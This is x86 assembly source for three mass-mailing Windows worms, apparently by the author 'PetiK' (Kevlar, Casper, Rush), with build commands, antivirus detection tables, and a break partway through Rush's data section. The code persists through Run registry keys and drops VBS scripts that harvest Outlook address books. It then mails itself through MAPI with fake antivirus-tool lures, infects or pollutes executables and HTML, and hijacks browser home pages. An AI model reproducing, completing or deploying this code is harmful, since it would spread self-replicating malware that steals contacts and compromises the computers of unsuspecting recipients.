
comment # Name : I-Worm.Kevlar Author : PetiK Date : August 7th - August 16th Language : ASM Size : 5120 byte Action : Copy itself to %System%\Kevlar32.exe hidden attribute %System%\MScfg32.exe normal attribute Add HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Kevlar32 = %System %\Kevlar32.exe * Infect %Windir%\C???????.exe file on writing * Infect %Windir%\*.exe It add .htm and create * Create C:\__.vbs This file takes all address the %windir%\AddBook.txt. The worm scan this file to : as "PetiK" in the file a new file with ActiveX in the Address Book at save them in find the address and send a new mail

Subject : Windows Protect !! Body : The smallest software to stop your computer to bug in each time. I have found this program on WWW.KEVLAR-PROTECT.COM Take a look at the attchment. Bye and have a nice day. Attachment : MScfg32.exe * It creates the %windir%\MSinfo32.txt. I look like this : [File Infected] => Name of C???????.exe file infected CLEANMGR.EXE=Infected by W32.Kevlar.PetiK CVTAPLOG.EXE=Infected by W32.Kevlar.PetiK [EMail saved] => Some address found in the address book first@mail.com=Next victim second@mail.com=Next victim To build the worm: tasm32 /M /ML Kevlar tlink32 -Tpe -aa -x Kevlar,,,import32 upx -9 Kevlar.exe To delete the worm: @echo off del %windir%\system\Kevlar32.exe del %windir%\system\MScfg32.exe del %windir%\*.exe.htm del %windir%\MSinfo32.txt del %windir%\AddBook.txt # .586p .model flat .code JUMPS callx macro a extrn a:proc call a endm include useful.inc DEBUT: F_NAME: mov push push callx mov push push push push 50 esi,offset Orig esi 0 GetModuleFileNameA edi,offset CopyName2 edi 50 edi

callx add mov stosd mov stosd mov stosd pop push push push callx mov push push push callx add mov stosb mov stosd mov stosd mov stosd pop push callx cmp je push push push callx

GetSystemDirectoryA edi,eax eax,'cSM\' eax,'23gf' eax,'exe.' edi 0 edi esi CopyFileA edi,offset CopyName edi 50 edi GetSystemDirectoryA edi,eax al,'\' eax,'lveK' eax,'23ra' eax,'exe.' edi esi GetFileAttributesA eax,1 SUITE 0 edi esi CopyFileA

push 01h push edi callx SetFileAttributesA REG: pushad @pushsz "SHLWAPI.dll" callx LoadLibraryA test eax,eax jz FIN mov edi,eax @pushsz "SHSetValueA" push edi callx GetProcAddress test eax,eax jz FIN mov esi,eax push 08h push offset CopyName push 01h @pushsz "Kevlar32" @pushsz "SOFTWARE\Microsoft\Windows\CurrentVersion\Run" push 80000002h call esi push edi callx FreeLibrary popad call Nick

mov edi,offset nickname push 40h @pushsz "Hello, my name is :" push edi push 0 callx MessageBoxA call Infect

jmp

FIN

SUITE: call Infect2 VB_F: pushad push 00h push 80h push 02h push 00h push 01h push 40000000h @pushsz "C:\__.vbs" callx CreateFileA test eax,eax xchg edi,eax push 00h push offset octets push VBSSIZE push offset vbsd push edi callx WriteFile push edi callx CloseHandle popad push 1 @pushsz "wscript C:\__.vbs" callx WinExec push 10000 callx Sleep @pushsz "C:\__.vbs" callx DeleteFileA SCAN1: push push push callx add mov stosd mov stosd mov stosd xor stosd call FIN: mov edi,offset addbook edi 50 edi GetWindowsDirectoryA edi,eax eax,"ddA\" eax,"kooB" eax,"txt." eax,eax OPEN

push 00h callx ExitProcess Nick Proc mov edi,offset nickname callx GetTickCount push 9 pop ecx xor edx,edx div ecx inc edx mov ecx,edx name_g: push ecx callx GetTickCount push 'Z'-'A' pop ecx xor edx,edx div ecx xchg eax,edx add al,'A' stosb callx GetTickCount push 100 pop ecx xor edx,edx div ecx push edx callx Sleep pop ecx

loop ret Nick

name_g EndP

Infect Proc pushad push 50 push offset WinPath callx GetWindowsDirectoryA push offset WinPath callx SetCurrentDirectoryA FFF: push offset Search @pushsz "C???????.exe" callx FindFirstFileA inc eax je F_INF dec eax mov [exeHdl],eax I_FILE: mov verif,0 xor eax,eax push eax push eax push 03h push eax push eax push 80000000h or 40000000h push offset Search.cFileName callx CreateFileA inc eax jz FNF dec eax xchg eax,ebx xor push push push push push push callx test jz xchg xor push push push push push callx test jz xchg mov cmp jne cmp jne cmp jne cmp je mov mov mov inc push callx CL2: push callx CL1: push eax,eax eax eax eax 04h eax ebx CreateFileMappingA eax,eax CL1 eax,ebp eax,eax eax eax eax 06h ebp MapViewOfFile eax,eax CL2 eax,edi esi,eax word ptr [esi],"ZM" CL2 byte ptr [esi+18h],"@" CL2 word ptr [esi+80h],"EP" CL2 byte ptr [esi+12h],"P" CL2 word ptr [esi+12h],"eP" word ptr [esi+14h],"it" byte ptr [esi+16h],"K" verif edi UnmapViewOfFile ebp CloseHandle ebx

callx CloseHandle cmp verif,1 jne FNF mov edi,offset InfoFile push edi push 50 push edi callx GetWindowsDirectoryA add edi,eax mov eax,'iSM\' stosd mov eax,'3ofn' stosd mov eax,'xt.2' stosd mov al,'t' stosb pop edi mov esi,edi push esi @pushsz "Infected by W32.Kevlar.PetiK" push offset Search.cFileName @pushsz "File Infected" callx WritePrivateProfileStringA FNF: push offset Search push [exeHdl] callx FindNextFileA test eax,eax jne I_FILE FC: push [exeHdl] callx FindClose F_INF: popad ret Infect EndP Infect2 Proc pushad push 50 push offset WinPath callx GetWindowsDirectoryA push offset WinPath callx SetCurrentDirectoryA FFF2: push offset Search @pushsz "*.exe" callx FindFirstFileA inc eax je F_INF2 dec eax mov [exeHdl],eax I_FILE2: pushad mov edi,offset Search.cFileName push edi callx lstrlen add edi,eax mov eax,"mth." stosd xor eax,eax stosd push 00h push 80h push 02h push 00h push 01h push 40000000h push offset Search.cFileName callx CreateFileA test eax,eax xchg ebp,eax push 00h push offset octets push HTMSIZE

push offset htmd push ebp callx WriteFile push ebp callx CloseHandle popad FNF2: push offset Search push [exeHdl] callx FindNextFileA test eax,eax jne I_FILE2 FC2: push [exeHdl] callx FindClose F_INF2: popad ret Infect2 EndP OPEN: pushad push 00h push 80h push 03h push 00h push 01h push 80000000h push offset addbook callx CreateFileA inc eax je NO dec eax xchg eax,ebx xor push push push push push push callx test je xchg xor push push push push push callx test je xchg push push callx cmp jbe call F3: F2: F1: NO: push callx push callx push callx popad ret eax,eax eax eax eax 02h eax ebx CreateFileMappingA eax,eax F1 eax,ebp eax,eax eax eax eax 04h ebp MapViewOfFile eax,eax F2 eax,esi 00h ebx GetFileSize eax,03h F3 SCAN esi UnmapViewOfFile ebp CloseHandle ebx CloseHandle

; is the file empty ??

SCAN: pushad xor edx,edx mov edi,offset m_addr

push edi p_c: lodsb cmp al," " je car_s cmp al,0dh je entr1 cmp al,0ah je entr2 cmp al,"!" je f_mail cmp al,"@" je not_a inc edx not_a: stosb jmp p_c car_s: inc esi jmp p_c entr1: xor al,al stosb pop edi test edx,edx je SCAN call SEND_MAIL jmp SCAN entr2: xor al,al stosb pop edi jmp SCAN f_mail: popad ret SEND_MAIL: push 50 push offset save_addr callx GetWindowsDirectoryA @pushsz "\MSinfo32.txt" push offset save_addr callx lstrcat push offset save_addr @pushsz "Next victim" push offset m_addr @pushsz "EMail saved" callx WritePrivateProfileStringA xor eax,eax push eax push eax push offset Message push eax push [MAPIHdl] callx MAPISendMail ret

.data ; ===== INSTALLATION ===== Orig db 50 dup (0) CopyName db 50 dup (0) CopyName2 db 50 dup (0) nickname db 11 dup (?) ; ===== INFECTION ===== InfoFile db 50 dup (0) WinPath db 50 dup (0) exeHdl dd ? verif dd ? octets dd ? ; ===== MAIL ===== addbook db 50 dup (0) save_addr db 50 dup (0) m_addr db 128 dup (?) MAPIHdl dd 0 subject db "Windows Protect !!",00h body db "The smallest software to stop your computer to bug in each time.",0dh,0ah db "I have found this program on WWW.KEVLAR-PROTECT.COM",0dh,0ah,0dh,0ah db "Take a look at the attchment.",0dh,0ah,0dh,0ah db 09h,09h,"Bye and have a nice day.",00h

NameFrom Message

db "Your friend",00h dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd ? offset offset ? ? ? 2 offset 1 offset 1 offset

subject body

MsgFrom MsgTo Attach

MsgFrom

? ? NameFrom ? ? ? ? 1 offset m_addr offset m_addr ? ? ? ? ? offset CopyName2 ? ?

MsgTo

Attach

htmd: db '<html><head><title>PetiKVX come back</title></head><body>',0dh,0ah db '<script language=vbscript>',0dh,0ah db 'on error resume next',0dh,0ah db 'set fso=createobject("scripting.filesystemobject")',0dh,0ah db 'If err.number=429 then',0dh,0ah db 'document.write "<font face=''verdana'' size=''2'' color=''#FF0000''>' db 'You need ActiveX enabled to see this file<br><a href=''javascript:location.reload()''>' db 'Click Here</a> to reload and click Yes</font>"',0dh,0ah db 'Else',0dh,0ah db 'Set ws=CreateObject("WScript.Shell")',0dh,0ah db 'document.write "<font face=''verdana'' size=''3'' color=red>' db 'This page is generate by a worm<br>But this worm is proteced by Kevlar<br></font>"',0dh,0ah db 'document.write "<font face=''verdana'' size=''2'' color=blue><br>' db 'Worms are not dangerous for your computer but to survive, they must be strong</font>"',0dh,0ah db 'ws.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.avp.ch"',0dh,0ah db 'End If',0dh,0ah db '</script></html>',00h HTMSIZE = $-htmd vbsd: db 'On Error Resume Next',0dh,0ah db 'Set Kevlar = CreateObject("Outlook.Application")',0dh,0ah db 'Set L = Kevlar.GetNameSpace("MAPI")',0dh,0ah db 'Set f=CreateObject("Scripting.FileSystemObject")',0dh,0ah db 'Set c=f.CreateTextFile(f.GetSpecialFolder(0)&"\AddBook.txt")',0dh,0ah db 'c.Close',0dh,0ah db 'For Each M In L.AddressLists',0dh,0ah db 'If M.AddressEntries.Count <> 0 Then',0dh,0ah db 'For O = 1 To M.AddressEntries.Count',0dh,0ah db 'Set P = M.AddressEntries(O)',0dh,0ah db 'Set c=f.OpenTextFile(f.GetSpecialFolder(0)&"\AddBook.txt",8,true)',0dh,0ah db 'c.WriteLine P.Address',0dh,0ah db 'c.Close',0dh,0ah db 'Next',0dh,0ah

db 'End If',0dh,0ah db 'Next',0dh,0ah db 'Set c=f.OpenTextFile(f.GetSpecialFolder(0)&"\AddBook.txt",8,true)',0dh,0ah db 'c.WriteLine "!"',0dh,0ah db 'c.Close',0dh,0ah VBSSIZE = $-vbsd signature db "I-Worm.Kevlar coded by PetiK (c)2001",00h equ 260 struct dd ? dd ? ends struct dd ? FILETIME ? FILETIME ? FILETIME ? dd ? dd ? dd ? dd ? dd MAX_PATH (?) db 13 dup (?) db 3 dup (?) ends

MAX_PATH FILETIME dwLowDateTime dwHighDateTime FILETIME WIN32_FIND_DATA dwFileAttributes ftCreationTime ftLastAccessTime ftLastWriteTime nFileSizeHigh nFileSizeLow dwReserved0 dwReserved1 cFileName cAlternateFileName WIN32_FIND_DATA Search end DEBUT end

WIN32_FIND_DATA <>

File Kevlar.exe received on 05.16.2009 17:43:00 (CET) Antivirus Version Last Update Result a-squared 4.0.0.101 2009.05.16 Email-Worm.Win32.Petik!IK AhnLab-V3 5.0.0.2 2009.05.16 Win32/PetTick.5120 AntiVir 7.9.0.168 2009.05.15 Worm/Petik.Kev Antiy-AVL 2.0.3.1 2009.05.15 Worm/Win32.Win32 Authentium 5.1.2.4 2009.05.16 W32/Malware!c6f1 Avast 4.8.1335.0 2009.05.15 Win32:Kevlar AVG 8.5.0.336 2009.05.15 I-Worm/Petik.H BitDefender 7.2 2009.05.16 Generic.Malware.GSMsp!.411C2399 CAT-QuickHeal 10.00 2009.05.15 W32.Petik ClamAV 0.94.1 2009.05.16 Win32.Pet_Tick.M Comodo 1157 2009.05.08 Worm.Win32.Petik.L DrWeb 5.0.0.12182 2009.05.16 Win32.Petik.8192 eSafe 7.0.17.0 2009.05.14 Suspicious File eTrust-Vet 31.6.6508 2009.05.16 Win32/Kevlar F-Prot 4.4.4.56 2009.05.16 W32/Malware!c6f1 F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Petik Fortinet 3.117.0.0 2009.05.16 JS/KEVLAR.A GData 19 2009.05.16 Generic.Malware.GSMsp!.411C2399 Ikarus T3.1.1.49.0 2009.05.16 Email-Worm.Win32.Petik K7AntiVirus 7.10.737 2009.05.16 Email-Worm.Win32.Petik Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Petik McAfee 5616 2009.05.15 W32/PetTick@MM McAfee+Artemis 5616 2009.05.15 Artemis!95EC22B0B688 McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Petik.Kev Microsoft 1.4602 2009.05.16 Worm:Win32/Petick.M@mm NOD32 4080 2009.05.15 Win32/Petik.L Norman 6.01.05 2009.05.16 W32/Pet_Tick.5120 nProtect 2009.1.8.0 2009.05.16 Panda 10.0.0.14 2009.05.16 W32/Petik.C PCTools 4.4.2.0 2009.05.16 I-Worm.Petik.I1 Prevx 3.0 2009.05.16 Medium Risk Malware Rising 21.29.52.00 2009.05.16 Trojan.Petik Sophos 4.41.0 2009.05.16 W32/Kevlar Sunbelt 3.2.1858.2 2009.05.16 Worm.Petik Symantec 1.4.4.12 2009.05.16 W32.Pet_Tick.M TheHacker 6.3.4.1.326 2009.05.15 TrendMicro 8.950.0.1092 2009.05.15 WORM_PET.TICK.M VBA32 3.12.10.5 2009.05.16 Win32.Worm.Petik.8192 ViRobot 2009.5.15.1737 2009.05.15 I-Worm.Win32.Petik.5120 VirusBuster 4.6.5.0 2009.05.16 I-Worm.Petik.I1 Additional information File size: 5120 bytes MD5...: 95ec22b0b68815a9bf6def95e5c3b9b1 SHA1..: 00dbadea4b400e6e0ae58951d063a4943fd1fc8d PEiD..: UPX 2.90 [LZMA] -&gt; Markus Oberhumer, Laszlo Molnar &amp; John Reiser

comment # Name : I-Worm.Casper Author : PetiK Date : August 17th - August 24th Size : 6144 byte (compressed with UPX tool) Action : Copy * Add in * itself to WINDOWS\MsWinsock32.exe the key HKLM\Software\Microsoft\Windows\CurrentVersion\Run the value Winsock32 1.0 = WINDOWS\MsWinsock32.exe

To build the worm: tasm32 /ml /m9 Casper tlink32 -Tpe -c -x -aa Casper,,,import32,dllz upx -9 Casper.exe To delete the worm: del %windir%\MsWinsock32.exe del %windir%\CasperEMail.txt dllz.def file: IMPORTS WININET.InternetGetConnectedState SHLWAPI.SHSetValueA # .586p .model flat .code JUMPS callx macro a extrn a:proc call a endm include useful.inc DEBUT: Main_Worm: call call call call Hide_Worm Copy_Worm Check_Wsock Prepare_Spread_Worm

Connected_: push 00h push offset Tmp callx InternetGetConnectedState dec eax jnz Connected_ mov push push push callx add mov stosd mov stosd mov stosd mov stosd xor stosd call edi,offset casper_mail edi 50 edi GetWindowsDirectoryA edi,eax eax,"saC\" eax,"Erep" eax,"liaM" eax,"txt." eax,eax Spread_Worm

Hide_Worm proc

pushad @pushsz "Kernel32.dll" callx GetModuleHandleA xchg eax,ecx jecxz End_Hide @pushsz "RegisterServiceProcess" push ecx callx GetProcAddress xchg eax,ecx jecxz End_Hide push 1 push 0 call ecx End_Hide: popad ret Hide_Worm endp Check_Wsock proc Search_Wsock: push 50 mov edi,offset wsock_file push edi callx GetSystemDirectoryA add edi,eax mov eax,"osW\" stosd mov eax,"23kc" stosd mov eax,"lld." stosd xor eax,eax stosd push callx cmp jne xor push push push push push push push callx mov offset wsock_file GetFileAttributesA eax,20h End_Wsock eax,eax eax eax 03h eax eax 80000000h or 40000000h offset wsock_file CreateFileA wsckhdl,eax

File_Mapping: xor eax,eax push eax push eax push eax push 04h push eax push wsckhdl callx CreateFileMappingA test eax,eax jz Close_File mov wsckmap,eax xor push push push push push callx test jz mov mov eax,eax eax eax eax 06h wsckmap MapViewOfFile eax,eax Close_Map_File esi,eax wsckview,eax

Old_Infect: mov verif,0 cmp word ptr [esi],"ZM"

jne cmp je cmp je jmp

UnmapView_File byte ptr [esi+12h],"z" Infected_By_Happy word ptr [esi+38h],"ll" Infected_By_Icecubes UnmapView_File

Infected_By_Happy: push 10h push offset warning @pushsz "I-Worm.Happy coded by Spanska" push 00h callx MessageBoxA inc verif jmp UnmapViewOfFile Infected_By_Icecubes: push 10h push offset warning @pushsz "I-Worm.Icecubes coded by f0re" push 00h callx MessageBoxA inc verif jmp UnmapViewOfFile Already_Infected: inc verif jmp UnmapViewOfFile UnmapView_File: push wsckview callx UnmapViewOfFile Close_Map_File: push offset wsckmap callx CloseHandle Close_File: push wsckhdl callx CloseHandle End_Wsock: ret Check_Wsock endp Copy_Worm proc pushad Original_Name: push 50 mov esi,offset original push esi push 0 callx GetModuleFileNameA Copy_Name: mov edi,offset copy_name push edi push 50 push edi callx GetWindowsDirectoryA add edi,eax mov eax,'WsM\' stosd mov eax,'osni' stosd mov eax,'23kc' stosd mov eax,'exe.' stosd pop edi push 0 push edi push esi callx CopyFileA Reg_Registered: push 08h push edi push 01h @pushsz "Winsock32" @pushsz "Software\Microsoft\Windows\CurrentVersion\Run" push 80000002h callx SHSetValueA

push 08h @pushsz "PetiK - France - (c)2001" push 01h @pushsz "Author" @pushsz "Software\CasperWorm" push 80000001h callx SHSetValueA push 08h @pushsz "1.00" push 01h @pushsz "Version" @pushsz "Software\CasperWorm" push 80000001h callx SHSetValueA popad ret Copy_Worm endp Prepare_Spread_Worm proc pushad push 00h push 80h push 02h push 00h push 01h push 40000000h @pushsz "C:\CasperMail.vbs" callx CreateFileA xchg edi,eax push 00h push offset octets push VBSSIZE push offset vbsd push edi callx WriteFile push edi callx CloseHandle push 1 @pushsz "wscript C:\CasperMail.vbs" callx WinExec push 3 * 1000 callx Sleep @pushsz "C:\CasperMail.vbs" callx DeleteFileA popad ret Prepare_Spread_Worm endp Spread_Worm: pushad push 00h push 80h push 03h push 00h push 01h push 80000000h push offset casper_mail callx CreateFileA inc eax test eax,eax je End_Spread_worm dec eax xchg eax,ebx xor push push push push push push callx test je xchg xor eax,eax eax eax eax 02h eax ebx CreateFileMappingA eax,eax F1 eax,ebp eax,eax

push push push push push callx test je xchg push push callx cmp jbe call

eax eax eax 04h ebp MapViewOfFile eax,eax F2 eax,esi 00h ebx GetFileSize eax,03h F3 Scan_Mail

F3: push esi callx UnmapViewOfFile F2: push ebp callx CloseHandle F1: push ebx callx CloseHandle End_Spread_worm: popad ret Scan_Mail: pushad xor edx,edx mov edi,offset m_addr push edi p_c: lodsb cmp al," " je car_s cmp al,0dh je entr1 cmp al,0ah je entr2 cmp al,"#" je f_mail cmp al,"@" je not_a inc edx not_a: stosb jmp p_c car_s: inc esi jmp p_c entr1: xor al,al stosb pop edi test edx,edx je Scan_Mail call Send_Mail jmp Scan_Mail entr2: xor al,al stosb pop edi jmp Scan_Mail f_mail: FIN: push 00h callx ExitProcess Send_Mail: xor eax,eax push eax push eax push eax push offset Message push [MAPIHdl] callx MAPISendMail ret .data ; ===== Main_Worm ===== wsock_file db 50 dup (0)

; ===== Check_Wsock ===== wsckhdl dd 0 wsckmap dd 0 wsckview dd 0 PEHeader dd 0 warning db "Warning : You're infected by",00h verif dd ? ; ===== Copy_Worm ===== original db 50 dup (0) copy_name db 50 dup (0) ; ===== Prepare_Spread_Worm ===== octets dd ? ; ===== Spread_Worm ===== m_addr db 128 dup (?) casper_mail db 50 dup (0) mail_name db "Casper_Tool.exe",00h MAPIHdl dd 0 Tmp dd 0 subject body db db db db db db db db db dd dd dd dd dd dd dd dd dd dd dd MsgFrom dd dd dd dd dd MsgTo dd dd dd dd dd dd dd dd dd dd dd ? ? ? ? ? ? 1 offset m_addr offset m_addr ? ? dd ? ? ? offset original offset mail_name ? "Casper Tool Protect 1.00",00h "Hi,",0dh,0ah "Look at this attachment...",0dh,0ah "This freeware alert you if you infected by " "I-Worm.Happy and I-Worm.Icecubes.",0dh,0ah "These worms spread with the file WSOCK32.DLL in the SYSTEM path.",0dh,0ah "The tool Casper v.1.00 scans this specific file and displays a message " "if it infected.",0dh,0ah,0dh,0ah,0dh,0ah 09h,09h,09h,"Good Bye and have a nice day",00h dd ? offset subject offset body ? ? ? 2 offset MsgFrom 1 offset MsgTo 1 offset Attach dd ?

Message

Attach

vbsd: db 'On Error Resume Next',0dh,0ah db 'Set Casper = CreateObject("Outlook.Application")',0dh,0ah db 'Set L = Casper.GetNameSpace("MAPI")',0dh,0ah db 'Set fs=CreateObject("Scripting.FileSystemObject")',0dh,0ah db 'Set c=fs.CreateTextFile(fs.GetSpecialFolder(0)&"\CasperEMail.txt")',0dh,0ah db 'c.Close',0dh,0ah db 'For Each M In L.AddressLists',0dh,0ah db 'If M.AddressEntries.Count <> 0 Then',0dh,0ah db 'For O = 1 To M.AddressEntries.Count',0dh,0ah db 'Set P = M.AddressEntries(O)',0dh,0ah

db 'Set c=fs.OpenTextFile(fs.GetSpecialFolder(0)&"\CasperEMail.txt",8,true)',0dh,0ah db 'c.WriteLine P.Address',0dh,0ah db 'c.Close',0dh,0ah db 'Next',0dh,0ah db 'End If',0dh,0ah db 'Next',0dh,0ah db 'Set c=fs.OpenTextFile(fs.GetSpecialFolder(0)&"\CasperEMail.txt",8,true)',0dh,0ah db 'c.WriteLine "#"',0dh,0ah db 'c.Close',0dh,0ah VBSSIZE = $-vbsd MAX_PATH FILETIME dwLowDateTime dwHighDateTime FILETIME equ 260 struct dd ? dd ? ends

WIN32_FIND_DATA struct dwFileAttributes dd ? ftCreationTime FILETIME ? ftLastAccessTime FILETIME ? ftLastWriteTime FILETIME ? nFileSizeHigh dd ? nFileSizeLow dd ? dwReserved0 dd ? dwReserved1 dd ? cFileName dd MAX_PATH (?) cAlternateFileName db 13 dup (?) db 3 dup (?) WIN32_FIND_DATA ends Search end DEBUT end WIN32_FIND_DATA <>

File Casper.exe received on 05.16.2009 11:21:10 (CET) Antivirus a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot VirusBuster Version 4.0.0.101 5.0.0.2 7.9.0.168 2.0.3.1 5.1.2.4 4.8.1335.0 8.5.0.336 7.2 10.00 0.94.1 1157 5.0.0.12182 7.0.17.0 31.6.6508 4.4.4.56 8.0.14470.0 3.117.0.0 19 T3.1.1.49.0 7.10.735 7.0.0.125 5616 5616 6.7.6 1.4602 4080 6.01.05 2009.1.8.0 10.0.0.14 4.4.2.0 3.0 21.29.52.00 4.41.0 3.2.1858.2 1.4.4.12 6.3.4.1.326 8.950.0.1092 3.12.10.5 2009.5.15.1737 4.6.5.0 Last Update 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 2009.05.08 2009.05.16 2009.05.14 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.14 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 Result Email-Worm.Win32.Petik!IK Win32/Petik.worm.6144 Worm/Casper Worm/Win32.Win32 W32/Malware!791a Win32:Trojan-gen {Other} I-Worm/Petik.G Win32.Petik.E@mm Worm.Win32.Petik.J Win32.Petik.8192 Suspicious File Win32/Petik.6144!intended W32/Malware!791a Email-Worm.Win32.Petik W32/PetTick@mm Win32.Petik.E@mm Email-Worm.Win32.Petik Email-Worm.Win32.Petik Email-Worm.Win32.Petik W32/PetTick@MM W32/PetTick@MM Worm.Casper Worm:Win32/Petik.K@mm Win32/Petik.J W32/Pet_Tick.6144.A W32/Casper I-Worm.Petik.K1 High Risk Cloaked Malware W32/Petik-I Email-Worm.Win32.Petik W95.Pet_Tick.gen WORM_PET.TICK.R Win32.Worm.Petik.8192 I-Worm.Petik.K1

Additional information File size: 6144 bytes MD5...: 87e2b361908ac17e03ae947c75a140a2 SHA1..: f038e389ea778594125222e97d82a0a2c1404986 PEiD..: UPX 2.90 [LZMA] -&gt; Markus Oberhumer, Laszlo Molnar &amp; John Reiser

comment # Name : I-Worm.Rush Author : PetiK Date : August 27th - September 2nd Size : 5632 byte (compiled with UPX tool) Action : Copy * Add in * itself to WINDOWS\SYSTEM\Mail32.exe the key HKLM\Software\Microsoft\Windows\CurrentVersion\Run the value Mail Outlook = WINDOWS\SYSTEM\Mail32.exe

* On Wednesday it opens the cdrom * The 3rd it produces a sound * the 15th it alters "Search Page", "Start Page", and "Local Page" by * Creates %personal%\Read_Me.txt with a text * A vbs file search all email in the Oultook software and put them in the Mailbook.txt. The worm scans the file to find email. Subject : New Scan Virus... Body : Hi man, I send you the last update of ScanVir (v 2.5). Look at the file attached. Bye and have a nice day. Attached : ScanVir_25.exe * Scans title of windows : - Norton AntiVirus => Norton Virus : W32.Norton.Worm@mm - System Properties => Minimize the window To build the worm: @echo off tasm32 /ml /m9 Rush tlink32 -Tpe -c -x -aa Rush,,,import32,dllz upx -9 Rush.exe if exist *.obj del *.obj if exist *.map del *.map To delete the worm: del %windir%\system\Mail32.exe del %personal%\Read_Me.txt del %windir%\MailBook.txt # .586p .model flat .code JUMPS callx macro a extrn a:proc call a endm include useful.inc include myinclude.inc start: ;call hide_worm twin_worm: push mov push push callx mov push push push callx add 50 esi,offset orig_worm esi 0 GetModuleFileNameA edi,offset copy_worm edi 50 edi GetSystemDirectoryA edi,eax

mov stosd mov stosd mov stosd pop push push push callx

eax,"iaM\" eax,".23l" eax,"exe" edi 0 edi esi CopyFileA

push 8 push edi push 1 @pushsz "Mail Outlook" @pushsz "Software\Microsoft\Windows\CurrentVersion\Run" push 80000002h callx SHSetValueA check_date: push offset SystemTime callx GetSystemTime cmp [SystemTime.wDayOfWeek],03h jne beep1 cdrom_open: push 00h push 00h push 00h @pushsz "open cdaudio" callx mciSendStringA push 00h push 00h push 00h @pushsz "set cdaudio door open" callx mciSendStringA beep1: callx cmp jne mov beep2: push callx push callx cmp jne push offset SystemTime GetSystemTime [SystemTime.wDay],03h special_folder counter,0 inc counter 30h MessageBeep 1 Sleep counter,5000 beep2

special_folder: push 00h push 05h push offset personal push 00h callx SHGetSpecialFolderPathA @pushsz "\Read_Me.txt" push offset personal callx lstrcat txt_file: push push push push push push push callx mov push push push push push callx push 00h 01h 02h 00h 01h 40000000h offset personal CreateFileA [FileHdl],eax 00h offset octets TXTSIZE offset txtd [FileHdl] WriteFile [FileHdl]

callx CloseHandle vbs_file: pushad push 00h push 80h push 02h push 00h push 01h push 40000000h @pushsz "C:\rushhour.vbs" callx CreateFileA xchg edi,eax push 00h push offset octets push VBSSIZE push offset vbsd push edi callx WriteFile push edi callx CloseHandle popad push 1 @pushsz "wscript C:\rushhour.vbs" callx WinExec push 2000 callx Sleep @pushsz "C:\rushhour.vbs" callx DeleteFileA push callx cmp jne call start_scan: mov push push push callx add mov stosd mov stosd mov stosd mov stosd xor stosd offset SystemTime GetSystemTime [SystemTime.wDay],0Fh start_scan internet_page edi,offset mailbook edi 50 edi GetWindowsDirectoryA edi,eax eax,"iaM\" eax,"ooBl" eax,"xt.k" ax,"t" eax,eax

open_scan_file: pushad push 00h push 80h push 03h push 00h push 01h push 80000000h push offset mailbook callx CreateFileA inc eax je not_exist dec eax xchg eax,ebx xor push push push push push push callx eax,eax eax eax eax 2 eax ebx CreateFileMappingA

test je xchg xor push push push push push callx test je xchg push push callx cmp jbe

eax,eax F1 eax,ebp eax,eax eax eax eax 4 ebp MapViewOfFile eax,eax F2 eax,esi 0 ebx GetFileSize eax,3 F3

scan_file: xor edx,edx mov edi,offset mail_addr push edi p_c: lodsb cmp al," " je car_s cmp al,0dh je entr1 cmp al,0ah je entr2 cmp al,"#" je f_mail cmp al,"@" jne not_a inc edx not_a: stosb jmp p_c car_s: inc esi jmp p_c entr1: xor al,al stosb pop edi test edx,edx je scan_file call send_mail jmp scan_file entr2: xor al,al stosb pop edi jmp scan_file f_mail: F3: push esi callx UnmapViewOfFile F2: push ebp callx CloseHandle F1: push ebx callx CloseHandle not_exist: popad scan_window:mov counter,0 win1: inc counter cmp counter,1000000 je end_w @pushsz "Norton AntiVirus" push 00h callx FindWindowA test eax,eax jz win2 jmp change_nav win2: @pushsz "System Properties" push 00h callx FindWindowA test eax,eax jz win3

jmp show_window win3: @pushsz "Microsoft Home Page - Microsoft Internet Explorer" push 00h callx FindWindowA test eax,eax jz win1 jmp display_message change_nav: mov edi,eax @pushsz "Norton Virus : W32.Norton.Worm@mm" push edi callx SetWindowTextA jmp win1 show_window: mov edi,eax push 2 push edi callx ShowWindow jmp win1 display_message: mov edi,eax push 10h @pushsz "Microsoft Internet Explorer" @pushsz "You don't have access to this page" push 00h callx MessageBoxA push 0 push edi callx ShowWindow jmp win1 end_w: push 00h callx ExitProcess hide_worm: pushad @pushsz "Kernel32.dll" callx GetModuleHandleA xchg eax,ecx jecxz end_hide_worm @pushsz "RegisterServiceProcess" push ecx callx GetProcAddress xchg eax,ecx jecxz end_hide_worm push 1 push 0 call ecx end_hide_worm: popad ret internet_page: pushad call diff_val db "Search Page",0 db "Start Page",0 db "Local Page",0 diff_val: pop esi push 3 pop ecx page_loop: push ecx push 32 @pushsz "http://www.petik.fr.fm" push 1 push esi @pushsz "Software\Microsoft\Internet Explorer\Main" push 80000001h callx SHSetValueA @endsz pop ecx loop page_loop popad ret send_mail:

xor push push push push push callx ret

eax,eax eax eax offset Message eax [MAPIHdl] MAPISendMail

.data ; === copy_worm === orig_worm db 50 dup (0) copy_worm db 50 dup (0) ; === beep === counter dd ?

; === special_folder === personal db 70 dup (0) octets dd ? FileHdl dd ? ; === scan email === mailbook db 50 dup (0) mail_addr db 128 dup (?) MAPIHdl dd 0 name_mail db "ScanVir_25.exe",0

subject body

namefrom Message

db db db db db dd dd dd dd dd dd dd dd dd dd dd

